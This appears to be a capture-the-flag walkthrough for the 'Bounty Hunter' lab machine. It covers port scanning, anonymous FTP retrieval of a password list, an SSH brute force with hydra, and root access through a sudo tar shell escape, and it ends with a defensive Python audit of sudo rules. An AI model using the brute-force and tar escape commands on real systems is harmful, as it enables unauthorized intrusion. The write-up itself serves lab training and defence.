Bounty Hunter — Cowboy Bebop is one of my favorite anime. Let’s start by clicking the Deploy button!
After deploying, I set an environment variable TARGET for the target box so I don't need to keep typing the IP:
$ export TARGET=10.10.114.135
#Deploy the machine. — No answer needed
#Find open ports on the machine — No answer needed
Though it does not require an answer, the question suggests running nmap against the box:
$ nmap -sV -sC $TARGET
The FTP service allows anonymous login, so let's try it:
$ ftp $TARGET
We found locks.txt and task.txt. Let's download them.
ftp> get locks.txt
ftp> get task.txt
#Who wrote the task list? — lin
Reading task.txt gives us the answer:
$ cat task.txt
#What service can you bruteforce with the text file found? — SSH
Looking at locks.txt, we get a list of passwords. I guess we can brute force the SSH service with it:
$ cat locks.txt
#What is the users password? — [NO SPOILER]
Let’s try to brute force the SSH service with the given passwords:
$ hydra -f -I -vV -t 64 -l lin -P ./locks.txt $TARGET ssh
#user.txt — [NO SPOILER]
Logging in with the username and password from the previous step, we have a shell!
$ ssh lin@$TARGET
Let’s examine user.txt.
#root.txt — [NO SPOILER]
To see whether we can get root, we first check which commands we are allowed to run with sudo:
$ sudo -l
It’s the tar program. Let’s look it up on https://gtfobins.github.io/
$ sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
Got root! The answer is right in front of us!
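From the defender's side, the sudo rule used above is the thing to catch in review. The following is an added example, not part of the original walkthrough: it audits `sudo -l` output for rules that grant binaries with documented shell escapes. The sample output, the hostname `examplehost`, the binary paths and the contents of `ESCAPE_CAPABLE` are constructed assumptions.

```python
import re

# Subset of binaries with documented sudo shell escapes on GTFOBins.
# Assumption: extend this set for your own environment.
ESCAPE_CAPABLE = {"tar", "vim", "less", "more", "man", "find", "awk", "env", "perl", "python"}

# Matches rule lines of `sudo -l`, e.g. "    (root) NOPASSWD: /bin/tar"
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def audit_sudo_l(text):
    """Return one finding per sudo rule that grants an escape-capable binary."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header lines, Defaults entries, blank lines
        runas = m.group("runas").strip()
        nopasswd = "NOPASSWD:" in m.group("tags")
        # Simplification: commands are split on commas; escaped commas are not handled.
        for cmd in filter(None, (c.strip() for c in m.group("cmds").split(","))):
            path, _, args = cmd.partition(" ")
            binary = path.rsplit("/", 1)[-1]
            if path != "ALL" and binary not in ESCAPE_CAPABLE:
                continue
            # A rule without an argument list accepts any arguments;
            # wildcard arguments are nearly as loose.
            loose = path == "ALL" or not args or "*" in args
            findings.append({"runas": runas, "binary": binary, "nopasswd": nopasswd,
                             "risk": "high" if loose else "review", "rule": cmd})
    return findings


# Constructed sample of `sudo -l` output (not captured from the target box).
SAMPLE = """\
Matching Defaults entries for lin on examplehost:
    env_reset, mail_badpass

User lin may run the following commands on examplehost:
    (root) /bin/tar
    (root) NOPASSWD: /usr/bin/id, /usr/bin/less /var/log/*
"""

if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE):
        print(f"[{f['risk']}] runas={f['runas']} nopasswd={f['nopasswd']} rule={f['rule']}")
```

A rule flagged `high` is best replaced by a fixed wrapper script or a rule with a fully pinned argument list, so the user cannot supply options such as tar's checkpoint actions.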